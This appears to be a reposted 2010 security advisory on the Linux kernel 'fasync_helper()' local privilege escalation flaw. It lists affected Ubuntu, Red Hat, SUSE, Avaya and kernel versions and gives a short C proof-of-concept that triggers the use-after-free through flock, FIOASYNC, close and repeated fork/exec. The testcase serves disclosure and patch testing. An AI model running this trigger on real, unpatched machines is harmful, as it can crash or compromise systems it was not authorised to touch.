Linux Kernel 'fasync_helper()' Local Privilege Esc
Posted on 17 March 2010
======================================================================= Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability ======================================================================= Credit: Tavis Ormandy Vulnerable: Ubuntu Ubuntu Linux 9.10 sparc Ubuntu Ubuntu Linux 9.10 powerpc Ubuntu Ubuntu Linux 9.10 lpia Ubuntu Ubuntu Linux 9.10 i386 Ubuntu Ubuntu Linux 9.10 amd64 Ubuntu Ubuntu Linux 9.04 sparc Ubuntu Ubuntu Linux 9.04 powerpc Ubuntu Ubuntu Linux 9.04 lpia Ubuntu Ubuntu Linux 9.04 i386 Ubuntu Ubuntu Linux 9.04 amd64 Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 Ubuntu Ubuntu Linux 8.04 LTS sparc Ubuntu Ubuntu Linux 8.04 LTS powerpc Ubuntu Ubuntu Linux 8.04 LTS lpia Ubuntu Ubuntu Linux 8.04 LTS i386 Ubuntu Ubuntu Linux 8.04 LTS amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 S.u.S.E. openSUSE 11.2 RedHat Fedora 11 RedHat Enterprise Linux Desktop 5 client RedHat Enterprise Linux 5.3.z server RedHat Enterprise Linux 5 server Linux kernel 2.6.32 Linux kernel 2.6.31 5 Linux kernel 2.6.31 .2 Linux kernel 2.6.31 .11 Linux kernel 2.6.31 -rc7 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.31 -rc6 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.31 -rc3 Linux kernel 2.6.31 -rc1 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.31 Linux kernel 2.6.30 .1 Linux kernel 2.6.30 -rc6 Linux kernel 2.6.30 -rc5 Linux kernel 2.6.30 -rc3 Linux kernel 2.6.30 -rc2 Linux kernel 2.6.30 -rc1 Linux kernel 2.6.30 Linux kernel 2.6.29 .4 Linux kernel 2.6.29 .1 Linux kernel 2.6.29 -git8 Linux kernel 2.6.29 -git14 Linux kernel 2.6.29 -git1 Linux kernel 2.6.29 Linux kernel 2.6.28 .9 Linux kernel 2.6.28 .8 Linux kernel 2.6.28 .6 Linux kernel 2.6.28 .5 Linux kernel 2.6.28 .3 Linux kernel 2.6.28 .2 Linux kernel 2.6.28 .1 Linux kernel 2.6.28 -rc7 Linux kernel 2.6.28 -rc5 Linux kernel 2.6.28 -rc1 Linux kernel 2.6.28 -git7 Linux kernel 2.6.28 Linux kernel 2.6.33-rc4 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.32-rc8 Linux kernel 2.6.32-rc7 Linux kernel 2.6.32-rc5 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.32-rc4 Linux kernel 2.6.32-rc3 Linux kernel 2.6.32-rc2 Linux kernel 2.6.32-rc1 Linux kernel 2.6.31.6 Linux kernel 2.6.31.4 Linux kernel 2.6.31.2 Linux kernel 2.6.31.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.31-rc9 Linux kernel 2.6.31-rc8 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.31-rc7 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.31-rc5-git3 Linux kernel 2.6.31-rc4 Linux kernel 2.6.31-rc2 Linux kernel 2.6.31-git11 + Trustix Secure Enterprise Linux 2.0 + Trustix Secure Linux 2.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Linux kernel 2.6.30.5 Linux kernel 2.6.30.4 Linux kernel 2.6.30.3 Linux kernel 2.6.29-rc2-git1 Linux kernel 2.6.29-rc2 Linux kernel 2.6.29-rc1 Linux kernel 2.6.28.4 Linux kernel 2.6.28.10 Avaya Voice Portal 5.0 Avaya Aura System Platform 1.1 Avaya Aura System Manager 5.2 Avaya Aura SIP Enablement Services 5.2.1 Avaya Aura SIP Enablement Services 5.2 Avaya Aura Session Manager 5.2 Avaya Aura Session Manager 1.1 Avaya Aura Communication Manager 5.2 Avaya Aura Application Enablement Services 5.2 #ifndef _GNU_SOURCE # define _GNU_SOURCE #endif #include <stdio.h> #include <unistd.h> #include <stdint.h> #include <stdbool.h> #include <fcntl.h> #include <stdlib.h> #include <assert.h> #include <asm/ioctls.h> // Testcase for locked async fd bug -- taviso 16-Dec-2009 int main(int argc, char **argv) { int fd; pid_t child; unsigned flag = ~0; fd = open("/dev/urandom", O_RDONLY); // set up exclusive lock, but dont block flock(fd, LOCK_EX | LOCK_NB); // set ASYNC flag on descriptor ioctl(fd, FIOASYNC, &flag); // close the file descriptor to trigger the bug close(fd); // now exec some stuff to populate the AT_RANDOM entries, which will cause // the released file to be used. // This assumes /bin/true is an elf executable, and that this kernel // supports AT_RANDOM. do switch (child = fork()) { case 0: execl("/bin/true", "/bin/true", NULL); abort(); case -1: fprintf(stderr, "fork() failed, %m "); break; default: fprintf(stderr, "."); break; } while (waitpid(child, NULL, 0) != -1); fprintf(stderr, "waitpid() failed, %m "); return 1; } # ~ - [ [ : Inj3ct0r : ] ]